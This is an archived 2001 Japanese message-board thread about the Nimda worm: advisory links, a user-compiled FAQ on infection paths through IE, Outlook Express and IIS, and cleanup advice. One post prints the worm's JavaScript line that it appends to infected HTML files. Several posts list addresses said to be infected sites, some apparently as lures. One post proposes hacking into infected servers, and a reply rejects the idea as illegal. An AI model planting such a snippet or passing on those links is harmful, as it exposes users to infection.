5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

Nimda !! その産

1 :名無しさん@お腹いっぱい。:01/09/23 01:47
よしなさいって!!

2 :名無しさん@お腹いっぱい。:01/09/23 01:52
●前々スレ 「Nimda !!」
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1000870301

●前スレ 「Nimda その弐!!」
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1000973617

●関連リンク
マイクロソフト「Nimda ワーム に関する情報」
http://www.microsoft.com/japan/technet/security/nimdaalrt.asp

IPAセキュリティセンター
http://www.ipa.go.jp/security/topics/newvirus/nimda.html

シマンテック株式会社
http://www.symantec.com/region/jp/sarcj/data/w/w32.nimda.a@mm.html

トレンドマイクロ株式会社
http://www.trendmicro.co.jp/nimda/

日本ネットワークアソシエイツ株式会社
http://www.nai.com/japan/virusinfo/virN.asp?v=W32/Nimda@MM

●関連スレ
ニュース速報板「スーパー初心者のためのMSNウイルスすれ」
http://news.2ch.net/test/read.cgi?bbs=news&key=1000945627

3 : :01/09/23 01:52
Slashdotの記事
「ウイルスに狙われるのはIIS浸透の代償」
http://slashdot.jp/article.pl?sid=01/09/21/1751221&mode=thread&threshold=

4 :名無しさん@お腹いっぱい。:01/09/23 01:57
>>3
苦しい良いわけですな(藁

5 :名無しさん@お腹いっぱい。:01/09/23 01:58
●関連スレ
ニュース速報板「スーパー初心者のためのMSNウイルスすれ2」
http://news.2ch.net/test/read.cgi?bbs=news&key=1000909667

ニュース速報板「スーパー初心者のためのMSNウイルスすれ3」
http://news.2ch.net/test/read.cgi?bbs=news&key=1000945627

ニュース速報板「スーパー初心者のMSNウイルススレッド【最終板】」
http://news.2ch.net/test/read.cgi?bbs=news&key=1001009235

トレンドマイクロ・Nimda駆除単体ツール
http://www.trendmicro.co.jp/nimda/tool.asp

6 :名無しさん@お腹いっぱい。:01/09/23 01:58
現在でまわっているデマ情報
http://keisui.com/GIGAZINE/cgi-bin/news/html/lg/000325.htm

IEバージョン確認法
http://www.geocities.co.jp/Technopolis/2082/Soft/Ie/OE5str.htm

オンラインスキャン
http://www.trendmicro.co.jp/hcall/scan.htm

ウィルス情報
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.nimda.a@mm.html
http://www.nai.com/japan/virusinfo/virN.asp?v=W32/Nimda@MM
http://www.trendmicro.co.jp/virusinfo/troj_nimda.htm

7 :名無しさん@お腹いっぱい。:01/09/23 02:00
>>3
この記事(ITプロにある元記事のこと)に関してはすごく憤りを感じます。
また、評価内にあるあの擁護記事もね!
なんて無責任な発言なんだろうって思いましたよ

8 :名無しさん@お腹いっぱい。:01/09/23 02:15
┏━━━┓  ┏━ヒョンテ電子@感染中━━━┓
┃ IE  . ┃  ┃ JavaScript@readme.eml ..┃
┃(´д`)..┃←..┃┏━━━━━━━━━┓......┃
┃ マターリ..┃  ┃┃wavですが(゚Д゚)何か?┃......┃
┗━━━┛  ┃┃(((((((readme.exe)))))).┃......┃
         .┃┗━━━━━━━━━┛......┃
         .┗━━━━━━━━━━━━┛

 IE
(´д`)<読み込んだHTMLのJavaScriptで、読込先がreadme.emlになってるけど...オカシイヨナァ
 IE
(´д`)<まぁ、emlの関連付けはOEになってるから、OEに渡しとくか...

┏━━━━━━━━━━━━━━━━━━━┓
┃ OE  ←  readme.eml  ←    IE   ...┃
┃(´д`)┏━━━━━━━━━┓  (´д`)  ┃
┃ マターリ┃wavですが(゚Д゚)何か?┃ OEさーん . ┃
┃   ...┃(((((((readme.exe)))))).┃.....メールデスヨー┃
┃   ...┗━━━━━━━━━┛       ...┃
┗━━━━━━━━━━━━━━━━━━━┛

┏━━━━━━━━━━━━━━━━┓
┃ OE  .  .┏━━━━━━━━━┓ ┃
┃(´д`)   ..┃wavですが(゚Д゚)何か?┃ ┃
┃シンヨウスルヨ.┃(((((((readme.exe)))))).┃....┃
┃      .┗━━━━━━━━━┛ ┃
┗━━━━━━━━━━━━━━━━┛

┏━━━━━━━━━━━━━━━━┓
┃ OE                  ...........┃
┃(;゚д゚)  本当はEXEダヨン(゚∀゚)アーヒャヒャ ┃
┃ダマサレタァ アヒャ゚∀゚)readme.exe(゚∀゚アヒャ ┃
┃      .                 ┃
┗━━━━━━━━━━━━━━━━┛

9 :名無しさん@お腹いっぱい。:01/09/23 02:16
┏━━━━━━━━━━━━━━━━┓
┃Windows                ........┃
┃(゚∀゚)  (゚∀゚)アーヒャヒャ (゚∀゚)アーヒャヒャ. .....┃
┃アーヒャヒャ......アヒャ゚∀゚)readme.eml(゚∀゚アヒャ┃
┃readme.eml readme.eml readme.eml....┃          
┗━━━━━━━━━━━━━━━━┛          
  (゚∀゚)アーヒャヒャヒャ ゾウショクダヨーン
          ┃
━━━┳━マイクロソフトネットワーク、インターネット、ローカルファイルシステム、メール...━━━━╋━━━━
   .....┃           ┃                      (゚∀゚)ソーシン!アーヒャヒャ
  (゚∀゚)アーヒャヒャ   (゚∀゚)アーヒャヒャヒャ     ┏━━━━━━━━━━━━━━━━━━━━━━┓
┏(´д`)HTML━┓┏(゚д゚)IIS━━━━━┓ ┃Address: 受信トレイに有るメールのメールアドレス宛て┃
┃       .......┃┃            ┃ ┃中身:   readme.eml                   ┃
┃       .......┃┃ボクノサイトにオイデヨ!! ┃.┃(゚∀゚)アヒャヒャwaveダヨーンヒーヒヒヒ               .┃
┃ (´д`)   ....┃┃  (・∀・)カエレ!!   ┃.┃(((((((((((((readme.exe)))))))))))              .┃
┃ マターリ    ..┃┃            ┃ ┗━━━━━━━━━━━━━━━━━━━━━━┛
┗(´д`)HTML━┛┗(゚д゚)IIS━━━━━┛
    ↓           ↓
┏(゚∀゚)HTML━┓ ┏(゚∀゚)IIS━━━━━┓
┃readme.eml .┃ ┃プレゼントダヨ!!   ......┃
┃ (゚∀゚)アヒャ . ┃ ┃readme.eml    ......┃
┃アーヒャヒャヒャ  ┃ ┃(゚∀゚)ヨメ!!!!アーヒャヒャ!!..┃
┗(゚∀゚)HTML━┛ ┗(゚∀゚)IIS━━━━━┛

10 :mam:01/09/23 02:23
IE.6って使い勝手いいの?5.5と、どう違うの?

11 :名無しさん@お腹いっぱい。:01/09/23 02:27
>>10

スマソ、前スレ

http://ton.2ch.net/test/read.cgi?bbs=sec&key=1000973617&ls=100

>>505みてくれm(_ _)m

これFAQにまとめる根性いまないです・・。

12 :名無しさん@お腹いっぱい。:01/09/23 02:28
俺も気になるなぁIE6、でも板違いなので俺と一緒に板移ろう。

13 :名無しさん@お腹いっぱい。:01/09/23 02:31
>>12

いやそうじゃなくて、

http://ton.2ch.net/test/read.cgi?bbs=sec&key=1000973617&ls=100

>>505みてくれm(_ _)m

タノム。

14 :名無しさん@お腹いっぱい。:01/09/23 02:33
12は10に対するフォローね。タイミングミスった。

15 :mam:01/09/23 02:34
>>11
今、見てきました。まだ不安定みたいですね!
あ〜こわいなぁ・・・。

16 :950:01/09/23 02:51
>>951
それじゃどうしたらいいんでしょう・・(泣)
いちおう駆除ツールで処理して、その後、確認のために最新のノートンでウィルスチェックしたら大丈夫だったんです。
でも、レジストリエディタを検索したら、例のreadme.emlやら.read.exeやら見つかりました・・
もう、わけわかりません・・
前述の処置をしててもだめなのですか?
レジストリのこいつら、削除しても意味ないですか?

17 :(;´Д`):01/09/23 02:53
http://www.microsoft.com/japan/technet/security/nimdaalrt.asp
MSはIE6でもOE6も一緒にインストールすればいいと言っているが

http://memo.st.ryukoku.ac.jp/archive/200109.month/1377.html
Win2kはSP2+IE6+OE6でもやばいらしい……。
鬱。

18 :結論:01/09/23 02:57
IEは捨てるのが一番。

19 :>:01/09/23 03:00
>>7
IISは
 SBSの管理ツールとか
 MS ProxyServerとか、
Webサーバーをユーザが意識していなくても
起動を必要とする場合があり、そういうのも含めれば
実行されているIISは数多いと思われ。。。

まあ、本質的には必要のない場面でも、IISの使用を
ユーザに押し付けるMSの発想は納得いかん。。
仮にIISが健全だとしても、、重くなるだけ。。。。

20 :向こうにも書いたけど:01/09/23 03:01
検索がマズく無いなら、DOSで削除は?

21 :名無しさん@お腹いっぱい。:01/09/23 03:02
ガイシュツかもしれないけどwevの再生をクイックタイムとかの別プラグインにしておくと実は大丈夫かも

22 :結論:01/09/23 03:04
IEよりもノートンをOSの一部にすればよかったのに。

23 :名無しさん@お腹いっぱい。:01/09/23 03:14
>>8
の図は間違ってるってば

24 :名無しさん@お腹いっぱい。:01/09/23 03:21
>>23
そう?8じゃないけど、わりといい線いってるんじゃない?

25 :名無しさん@お腹いっぱい。:01/09/23 03:24
これからFAQカキコしますm(_ _)m

約8スレ程度になる見込みです。

26 :名無しさん@お腹いっぱい。:01/09/23 03:24
【人柱のみなさんに感謝(-人-)する FAQ(700)】

この中に含まれている枝リンク孫リンクのみなさんも含めて(-人-)
「 Nimda !! 」スレで偉大な実験や衝撃の体験を告白してくださったみなさんに感謝(-人-)
みなさんの人柱精神はたとえささやかなものであってもムダにはいたしません(-人-)

カッコ内は前スレ
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1000973617&ls=100
のスレ番号です。

理由の説明はありません。(理由の説明の誤りによる誤解を防ぐため)
現象のみを記録するよう努めました。

27 :名無しさん@お腹いっぱい。:01/09/23 03:25

●ニムダはWin95/98系など一般のパソコンでは感染しないのですか?

します。

(894)
9X系も感染するとある
http://www.symantec.com/region/jp/sarcj/data/w/w32.nimda.a@mm.html

28 :名無しさん@お腹いっぱい。:01/09/23 03:25
●IE6はニムダに対して安全なのですか?

(403)
IE6は限りなくグレー(´Д`)

貴重な人柱さんの体験
(292)
ファイルをIE上にドラッグしたらメディアプレイヤーが開いて、
”Windows Media player のエラー
オブジェクト名が見つかりませんでした。”
となった

(402)
http://memo.st.ryukoku.ac.jp/archive/200109.month/1302.html
のように勝手にreadme.exeを開く

(850)
レジストリにExolorerBars内のところにLoad.exeとかいわゆるNimda関連のファイル名が書き込まれた
(IE6W2K版)


http://www.microsoft.com/japan/technet/security/nimdaalrt.asp
Nimda ワーム の影響を受ける恐れのある製品


MicrosoftR Internet Explorer 6 (最小構成時のみ)

#なお、本当に最小構成時のみなのかは疑惑視されています。

29 :名無しさん@お腹いっぱい。:01/09/23 03:26

●感染して作られた〜.emlをマイコンピュータやエクスプローラーでクリックしただけで 再び感染することはある?(688)

あります。


●フォルダの設定でWeb表示(.JPGを選択と左側に寒ネイルが表示されるような)で感染サイトの.lnkファイル(お気に入りのこと)を選択すると? (460)

(463)
感染可能ブラウザの場合、選択(開くではない)だけで感染すると思われる。
これ、感染前の.lnkでもリアルタイム更新してると思われる。

(464)
WEB表示にしててネットワーク経由で入れられた *.emlファイルを
確認するため右クリックして選択しただけで感染した例がある。
(IEが未対応だったので)

補足:.htmlなどのファイルでも同様と思われる

30 :名無しさん@お腹いっぱい。:01/09/23 03:26
●検索をしてreadme.eml readme.exeファイルがなくても、エクスプローラでファイル操作するだけで感染することがありますか?(698)

あります。

(569)
C:\WINNT\Temporary Internet Files\Content.IE5\LHMMLNGA のような所に格納されている
main[1].html
みたいなファイル(キャッシュファイル)にふれてしまうと場合によっては感染する。




●readme.emlファイル・reame.exeファイル・nimda感染ファイル(.htmlなど) を手動で検索、削除。安全?(701)

(701)
場合によってはさわっただけで感染する。
その場合ドラッグや右クリックで削除できない(感染する)


【みなさんの人柱精神はたとえささやかなものであってもムダにはいたしません(-人-)】

31 :名無しさん@お腹いっぱい。:01/09/23 03:27
以上FAQカキコ終了しましたm(_ _)m

32 :名無しさん@お腹いっぱい。:01/09/23 03:28
>>24
前スレ見ろ

33 :名無しさん@お腹いっぱい。:01/09/23 03:29
>>32
よく我慢しました。

34 :しよ〜しゃたん ◆JHEd0Il. :01/09/23 03:31
>>25
8スレもまだ書いてないぞ(w

ずっと簡単にまとめると
 ・IE6はやめておけ
 ・エクスプローラ「Web表示」の設定にしない
かな

35 :名無しさん@お腹いっぱい。:01/09/23 03:33
>>31
サンキュ
また情報が出たら追加してくれる?

36 :FAQer:01/09/23 03:34
>>35

がんばりますm(_ _)m

37 :名無しさん@お腹いっぱい。:01/09/23 03:40
>>36
そのハンドルはなんと発音すればいいんだ?

38 : :01/09/23 03:41
ファッキュアー,じゃないの?
俺は>>36じゃないけどさ。

39 :名無しさん@お腹いっぱい。:01/09/23 03:42
>>37
「チョコボール向井」でええんじゃない?

40 :名無しさん@お腹いっぱい。:01/09/23 03:43
エフエーキュアー
でどうだ。どっかのワクチンソフトみたいだが。

41 :FAQer :01/09/23 03:44
>>39

ワラタ

42 :ムズカシイ...:01/09/23 04:12
>>23
文句を言うぐらいなら直してクレー
漏れは疲れた。(´д`)

43 :名無しさん@お腹いっぱい。:01/09/23 04:24
連休に入ったせいか情報も少なくなったね。
今感染している国内の鯖は火曜までこのままか。
アクセスも少ないからアポーンするユーザーも減るといいけど。

44 :名無しさん@お腹いっぱい。:01/09/23 04:27
最小構成ではないIE6でも感染するのか?!

45 :しよ〜しゃたん ◆JHEd0Il. :01/09/23 04:29
15分に1度程度になった>Nimda感染マシンからのアタック
どの程度で「沈静化」と見ればいいんだろうなぁ・・・

>>44
よくわかってないので、とりあえずIE6早めておいた方が無難

46 :(;´Д`)はぅ・・・:01/09/23 06:14
まとめてみたんですが、アホウなので更新キボンです。

対策(「対」は、事前対策)

対・IE6はやめておけ →IE5.5SP2の人はそのまま、6にしてしまった人はそのままでOK?
 (→どのバージョンにしても、ダイアログは出る。高バーは自動実行は防げる程度。
 →キャンセル等を選択せず、そのままダイアログ・ウインドウを閉じる。)
対・エクスプローラ「Web表示」の設定にしない 。
対・Javaはオフにする。
対・WAVの関連をメディア・プレーヤーからはずす?(疑問)
対・ノートン先生等の最新パターンファイルを装備。
 ・下手な検索・削除はしない。→シングルクリックでも実行されてしまう。
 →DOSからは消して問題なし?
対・OEとの関連を切るか、消してしまえばOK?(疑問)( しかし、将来的な解決にはならんだろ?)


 ・もし感染してたら、フォーマットして、クリーンインスト→IEバーの更新・パッチ当て・JAVA切り・WEB切り(・DLも切り?)→最新パターのアンチウイルスソフト入れる(→Winも?)
 で防御に備えるしかない?

無力ですが、たたき台にしてください。

47 :名無しさん@お腹いっぱい。:01/09/23 06:24
前スレに続いて良スレage

48 :名無しさん@お腹いっぱい:01/09/23 07:01
Windows 2000+IE6は危険。
最小インストールしか出来ないから。OE6は入れられない。

Windows 2000ではこれまでのIEと同様に,標準および完全インストールを実行できず,最小限のインストールになる。
IE6をインストールしたWindows 2000にはService Packを再導入してはならない。
IEがアンインストールできなくなるという。
いずれもWindows 2000が備えるWindowsファイル保護機能のため。
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20010919/3/

49 :名無しさん@お腹いっぱい。:01/09/23 07:19

あ〜、感染させるのも飽きた

50 :名無しさん@お腹いっぱい。:01/09/23 07:24
お前ら、もっと感染しろよ

51 :名無しさん@お腹いっぱい。:01/09/23 07:24
>>48
>最小インストールしか出来ないから。OE6は入れられない。

これはどっから出たデマなんですかねえ?
私、IE6のW2KインストールでOE6になりましたけど・・・

52 :名無しさん@お腹いっぱい。:01/09/23 07:27
今、153人感染しました

53 :名無しさん@お腹いっぱい。:01/09/23 07:28
おっと、154になりました

54 :名無しさん@お腹いっぱい。:01/09/23 07:29
もっとサイトの数、増やすかな

55 :名無しさん@お腹いっぱい。:01/09/23 07:38
>>48
そのリンク先って、感染サイトだろ?

56 :名無しさん@お腹いっぱい。:01/09/23 07:39
>>55

正解。ネスケで見ると窓が出る

57 : :01/09/23 07:47
>>55
感染してないよ?

58 :名無しさん@お腹いっぱい。:01/09/23 07:49
>>57
やれやれ、藁にもすがる思いでここに迷い込んでくる雛たちを苛めて楽しいのか?

59 :名無しさん@お腹いっぱい。:01/09/23 07:52
>>57
最低なヤツ

60 :名無しさん@お腹いっぱい。:01/09/23 07:53
>>57も最悪だが、>>48も根性捻くれまくった奴だな。

61 : :01/09/23 07:55
 ええ?どこらへんが感染してるの?

62 :名無しさん@お腹いっぱい。:01/09/23 07:56
>>61
そうやって誘い込むなって

63 :名無しさん@お腹いっぱい。:01/09/23 07:57
>>61
キミも感染したのか?悔しかったのは分かるが、やめろよ。

64 :名無しさん@お腹いっぱい。:01/09/23 07:58
>>57>>61
イッテヨシ

65 : :01/09/23 08:02
ネタなんだかマジなんだかわからん。
感染してるhtmlを示しておくれ。

66 :名無しさん@お腹いっぱい。:01/09/23 08:04
感染してるんだから見れねーだろ
知っててそう言うこと言うな

67 :名無しさん@お腹いっぱい。:01/09/23 08:05
>>65
おれは先生が警告出してくれる。

68 : :01/09/23 08:06
な〜んだ、Win2kにはIE6は最小でしかインストールできないか。
クソだなM$。

69 :極論だけど:01/09/23 08:11
やっぱIEを捨てるのが一番安全だな。

70 : :01/09/23 08:12
先生の警告って↓で出る?

<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>

71 :名無しさん@お腹いっぱい。:01/09/23 08:12
>>68
氏ね

72 :名無しさん@お腹いっぱい。:01/09/23 08:14
つーか、日経BPって感染サイトででかく出てたじゃねーかよ

73 : :01/09/23 08:17
>>49-64>>71 はWin2kなのにIE6を入れてしまって後悔してる人たちですか?(藁

マイクロソフトがIE6日本語版を提供開始,NT4と2000で異なる注意点
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20010919/3/

74 :名無しさん@お腹いっぱい。:01/09/23 08:21
>>73
いや、おまえがくだらん感染リンクを貼って、誘い込もうとしてるのに横槍を入れてるだけだよん。

75 :名無しさん@お腹いっぱい。:01/09/23 08:23
ID:GqEz8zi6

76 :名無しさん@お腹いっぱい。:01/09/23 08:24
>73  ID:GqEz8zi6

77 : :01/09/23 08:26
>日経BPって感染サイトででかく

感染サイトってなんだ?

78 :名無しさん@お腹いっぱい。:01/09/23 08:28
なんだこの荒れかたは?
出直してくるか

79 : :01/09/23 08:29
感染しているhtmlファイル名を言わないからネタだね。

80 :うひょのふ:01/09/23 08:29
感染時にできる*.emlファイルってどんなんでした?
友達にニムダ対策教えてあげて、SP2とか当てさせたんだけど、
<数字の羅列>.eml ってファイルが21個HDん中から見つかったって
これってもうアウト?

81 : :01/09/23 08:30
>>78
行かないでー (;;)

82 :名無しさん@お腹いっぱい。:01/09/23 08:30
>>77
感染したサイトとして  つー意味じゃねぇの?

83 :78:01/09/23 08:32
>>81
それじゃあ、お前逝ってくれよ

84 :名無しさん@お腹いっぱい。:01/09/23 08:32
>>77
暗喩と思われ。。

85 :名無しさん@お腹いっぱい。:01/09/23 08:34
>>80
文字列で検索かけたんじゃねーのか?

86 : :01/09/23 08:35
>>80
emlはメールファイル。
20ぐらいあっても普通。

1)readme.exe と root.exeの検索
2)ファイル中の文字列検索でreadme.eml探す。
3)ディスク中の.htmファイルの最後に>>70が付いてないかチェック。

87 :名無しさん@お腹いっぱい。:01/09/23 08:39
ttp://itpro.nikkeibp.co.jp/free/NT/NEWS/20010919/3/
は感染してなかったよ

IE6のProgram Files\Internet Explorer\Readme.txtからの抜粋ね
Windows 2000 へのインストール
-----------------------------
現在、Windows 2000で標準インストールおよび完全インストールを実行することはできません。
Internet Explorer 6はシステムに既定のファイル セットをインストールします。
これらは、Internet Explorer 6のWeb ブラウザおよびスクリプティングのサポートが含まれています。

88 :うひょのふ:01/09/23 08:41
>>85
いや、ちゃんとファイル名検索させたんですよ

>>86
友達がすんごく、いいかげんな奴なんで
メールファイルを自分で保存したかどうかなんて憶えてないんですよ
だからといって自分で開かせるのも怖いし・・・
readme.exeは一緒に検索させましたが、見つからなかったようです。
2)、3)に関してはこれから調べさせます。 感謝!!

89 :名無しさん@お腹いっぱい。:01/09/23 08:45
過去ログ読まずに87開いちゃったけど大丈夫?

90 : :01/09/23 08:50
>>89 平気

91 : :01/09/23 08:52
忘れてたけど、ここのオンラインスキャン使う手もある。
http://www.trendmicro.co.jp/hcall/scan.htm

92 :名無しさん@お腹いっぱい。:01/09/23 08:52
>>90
マジ?ほっとしたよ

93 :名無しさん@お腹いっぱい。:01/09/23 09:25
関係ないけど、Nimdaのべつめいって、CodeRainbowってのもあるんだってね

既出だったらスマソ

94 :FAQer:01/09/23 09:27
寝て起きたらえれーレベル下がったなぁ・・・。(´д`)

95 :名無しさん@お腹いっぱい。:01/09/23 09:40

いまさら感染するなよ、と言いたい。

ttp://www.ses-corp.co.jp/products/sst200/main.html
ttp://www.kyowa-kk.co.jp/

96 :名無しさん@お腹いっぱい。:01/09/23 09:42
>>65

こういうのがないからレベル下がるんだな・・。

ttp://210.12.193.252/
ttp://210.110.148.141/
ttp://210.12.157.160/
ttp://210.221.55.61/
ttp://210.65.38.221/
ttp://www2u.biglobe.ne.jp/~hole/


できれば前スレ見て自分でフォローしてくれ。
いちいち感染サイトが今も感染しているか確認するのもめんどくさい・・。

97 :名無しさん@お腹いっぱい。:01/09/23 10:01
アンチDOTE(ANTIDOTE がいいかも。

98 :名無しさん@お腹いっぱい。:01/09/23 10:24
>>97

スマソ、前スレでも見たが分かるように説明してくれ。

99 :名無しさん@お腹いっぱい。:01/09/23 11:20
>>98

DOTE(ANTIDOTE

をキーワードでgoogleくらいしたんだろうな?

100 :名無し:01/09/23 11:20
富士通最高。

101 ::01/09/23 11:22
>>100
F通 なんかあったの?

102 :名無しさん@お腹いっぱい:01/09/23 11:31
>>ttp://www2u.biglobe.ne.jp/~hole/
いまから・・Win2000+IE6でにアクセスしてみます
ちなみにIISはとめてます
Win2000→SP1→SP2→IE6とてれました
アンチウイルスソフトは入っていません

103 :名無しさん@お腹いっぱい。:01/09/23 11:40
>>102

>>96の最後の行はただのQ2じゃないの?
ActiveXをインストールさせようとするけど
これをウィルスっていったら、M$自体がウィルスだな。

104 :-:01/09/23 11:46
その画像ならココ
http://members.tripod.co.jp/bingo852/

105 :名無しさん@お腹いっぱい。:01/09/23 12:07
だから感染したサイトを張り付けるなって

106 : :01/09/23 12:10
とりあえず安全が確認できているサイト(チャットとか)では
IEのレベルを中にしてjavaを有効にして

知らないHPに行くときや検索かけるときはレベル高で、っていうのではダメかな?

107 :106:01/09/23 12:11
もちろんSP2でということですが.....

108 ::01/09/23 12:11
ログみたら、CodeRedとNimda 両方飛ばしてきてる所
あるな。
管理者きづけよ。。。

109 :名無しさん@お腹いっぱい。:01/09/23 12:13
俺的には、>>26-31>>46は、いい仕事してくれたと思うんだが、修正に排卵かい?

110 :名無しさん@お腹いっぱい。:01/09/23 12:14
てゆうか情報全然ないじゃん、ここ

111 :名無しさん@お腹いっぱい。:01/09/23 12:15
>>110
あ、そう。

112 :名無しさん@お腹いっぱい。:01/09/23 12:16
お前ら、もっと感染しろよ

113 :名無しさん@お腹いっぱい。:01/09/23 12:19
>>110

情報ならここにあるよ
http://210.12.193.252/

114 :102:01/09/23 12:36
>>103

ただのQ2でした。
そこで
>>113 の書いた感染サイトにいってみました

メディアプレーが起動しましたが、感染しませんでした

115 : :01/09/23 12:40
メディアプレー・・・
どんなプレー?

116 :名無しさん@お腹いっぱい。:01/09/23 12:42
なんだ感染サイトじゃないのか
安心した

117 :名無しさん@お腹いっぱい。:01/09/23 12:44
Win2000+IE6って大丈夫なの?

118 :名無しさん@お腹いっぱい。:01/09/23 12:46
いや、感染する

119 :名無しさん@お腹いっぱい。:01/09/23 12:48
http://210.12.193.252/
http://210.110.148.141/
http://210.12.157.160/
http://210.221.55.61/
http://210.65.38.221/

ここってなに?

120 ::01/09/23 12:50
ブラクラかも知れない、
感染源サイトかも知れないし
得体の知れないリンクはとりあえず無視するのが賢明。

121 :名無しさん@お腹いっぱい。:01/09/23 12:52

そこ、なんか音楽がなるよ

122 :名無しさん@お腹いっぱい。:01/09/23 12:53
sadmindにやられたサイトだね

123 ::01/09/23 12:54
接続プロバイダなどが、Codered や Nimdaなどの http GET は
フィルタしてしまうという措置やってくれないかね。。。

124 :名無しさん@お腹いっぱい。:01/09/23 12:57
やってくれない
プロバイダの関知するところではない。
お前ら一般ユーザーの尻ぬぐいをプロバイダがするわけがない

125 :名無しさん@お腹いっぱい。:01/09/23 12:58
>>123
なんで人任せにする?

126 :100:01/09/23 12:59
>>101
今度かう予定

127 :名無しさん:01/09/23 13:01
>>123
インターリンクがコードレッドバスターを設置したが、評判が
悪くて5日で撤去してた。
詳しくはプロバイダー板のインターリンクスレ参照。

『コードレッドバスター』設置について 2001.08.15
http://www.interlink.or.jp/notification/backno/2001/info015.html

128 ::01/09/23 13:07
人任せにする気にする気はないが、
世の中にちゃんと管理されてないマシンで
なおかつ繋がっているものが
これだけ増えてくると、
 (
CodeRedやられたまま未だに放置されてるサーバとか
   結構あるしょ

そういう対応(上流でのフィルタとか)
も必要じゃないかなという気がする。
自営ドメイン自前サーバが以前よりダイブお手軽になっちゃった
わけだから、そいうった”大衆化”に合わせる必要がでてるんじゃ
ないかなあと。。。

129 :真一郎:01/09/23 13:25
IE6をインストールして、2CHを見るとエラーにまり、再起動を要求されるのですが、いったいこれはいかがなものでしょうか。

130 : :01/09/23 13:27
>>121はとっくに感染してるんじゃない?

131 :名無しさん@お腹いっぱい。:01/09/23 13:35
>>98

ANTIDOTE http://www.vintage-solutions.com/indexie4-jpn.htmlANTIDOTE Personal 2000
2000/12/01 販売開始
ANTIDOTE for PC Viruses Personal 2000 は、好評の簡易型ウイルス検索プログラムを発展させた新しいタイプのウイルス対策ソフトウェアです。

本製品は簡易型同様にインストーラなしにシステム導入するため、システムへの組込みは極めて簡単です。また現在ご使用のウイルス対策製品に競合することなく動作するため、二次的なウイルス対策製品としてもご使用頂けます。

132 :102:01/09/23 13:43
メディアプレーヤー7.1・・インストールしてた・・
やりなおします

133 :名無しさん@お腹いっぱい。:01/09/23 14:08
>>123-124
ISPの端くれとしての意見。
HTTPでGETしてる内容の監視をすることになってしまいますからね。
ウィルスもらうのも出すのもお客さんの自由であって、それを
ウィルスだからと阻害するのは、ある意味通信内容の検閲に
該当するという意見もありますから。
やってるとこもあるようですが、個人的には疑問です。

134 :102:01/09/23 14:17
やっぱ・・感染しませんでした。
メディアプレーヤーは起動したけど・・終了と詳細しかえらべなかった
いったん・・IE6さくじょしていれなおしたんじゃたんじゃだめなのかな・・

135 :>133:01/09/23 14:24
ユーザのオプションで入りパケットをフィルタする
サービスはあっていいかも知れない。。

でも、、CodeRedにやられたまま、放置してるような人って
こんなサービスあっても使わんだろうな。。。。

136 :133:01/09/23 14:50
>>135
ユーザオプションてことであれば同感。

ユーザの要求と正当な対価、および利益あたりがバランスすれば
ISPにできることってかなりあるんだけどね。

ほとぼりが冷めたころにきっとまた増えるよ<感染サーバ

137 : :01/09/23 15:34
YahooBBは当初80番の入りパケットをフィルタリングしてたけど不評で止めた。
透過プロシキ使っても嫌がるユーザーも多いし。
HTTP/GETの内容見てのフィルタじゃ誤動作もある程度考えなければならない。例-インターリンクのコードレッドバスター
80番ポートはインターネットで一番かなめのサービスだから難しいな。
ファイアーウォール設置していても感染するワームをISPのサービスに期待するのは酷でしょう。

138 : :01/09/23 15:41
感染サイトに入りこんでシャットダウンすればいいじゃん?
なんでやらないの?

法的問題は無いだろ?
留守にしている他人の家で小火(ぼや)があったら、上がりこんで消してもいいだろうに。

139 : :01/09/23 15:57
>>138
それはCodeRedの時さんざん議論されたが、法的に問題がある。
判例がないから、裁判所がどう判断するかは未知数だが、
緊急避難には当たらない可能性が高い。

よかれと思ってやって捕まっちゃったら損だ。

140 :ど素人のおぢさん:01/09/23 16:10
それは9月21日金曜日のことです。
その夜のテレビのニュースで流れたNimdaの事が気になり、ちょうど良い機会に
思えましたので、ずっとほかしておいたウイルスバスターのウイルス定義をアッ
プデートしようとインターネットに接続したのです。
そう、あれは夜8時40分過ぎのことだったと思います。
Outlook2000を立ち上げてからIE(5.5sp1)を起動。いつものVAIOホームページが
表示されると、ウイルスバスターのコンソールからウイルス定義の更新を行い、
最新データをダウンロードいたしました。
さて、せっかく手に入った最新データ、早速「マイコンピュータのスキャン」を
実行しましたが、その間、並行してメールもダウンロードし、いくつかのサイト
を閲覧しておりましたところ・・・なんとNimda感染のメッセージが!!
ファイルはc:\Admin.dll(2001/09/21 20:49)および、d:\Admin.dllの二つ。
これって、この日感染したって事ですかね?運がいいのやら悪いのやら。

141 :>:01/09/23 16:11
CodeRedとNimdaと両方とばしてくれるサイト管理者に注意を出そうと
思ったら、
そのドメイン、DNS参照でmxレコードがでてこない。

142 :名無しさん@お腹いっぱい。:01/09/23 16:32
ニムダ感染でバックアップHDやその他の周辺機器の売り上げが伸びて
ニムダ特需が起きてると思われ。

143 : :01/09/23 16:35
>>140
つーかTVでNimdaの事知ってたのに
ネットサーフィン&メールって・・・?

144 :名無しさん@お腹いっぱい。:01/09/23 16:40
>>143

要するに意識の差でしょ?普段から、この板来ているような人は
元々意識が高いから、あまり感染しない。

感染しても騒がず、対処も知っているからばら撒かない。

一方、普段から意識の低い人は・・・・(以下、略)。

145 :名無しさん@お腹いっぱい。:01/09/23 16:53
W2k+IE6で感染サイト行ったら、ウィンドウが一つ出来たが感染はしなかった
よ〜ん。

このスレの意義は勇敢な人柱にあり。

146 :>143:01/09/23 17:28
>一方、普段から意識の低い人は・・・・(以下、略)。
そういう人達もドメイン自営、自前サーバを簡単にたてる時代
になったことが問題ですね。
大衆化しちゃった以上、個人の意識レベルではなく
社会の仕掛けとして対策が必要とも思うのです。

147 :名無しさん@お腹いっぱい。:01/09/23 17:46
IIS やメールの話はいっぱいあるけど,共有の何がどういう風に危ないのか情報を見つけられないんだけど,どこにあるの?

148 :名無しさん@お腹いっぱい。:01/09/23 18:09
http://210.210.21.33/
http://210.220.111.217/
http://210.110.148.141/
http://210.12.157.160/
http://210.12.193.252/
http://210.65.38.221/
http://210.221.55.61/

このアドレス全部が既読になってる漏れは勇者ですか?

149 :名無しさん@お腹いっぱい。:01/09/23 18:10
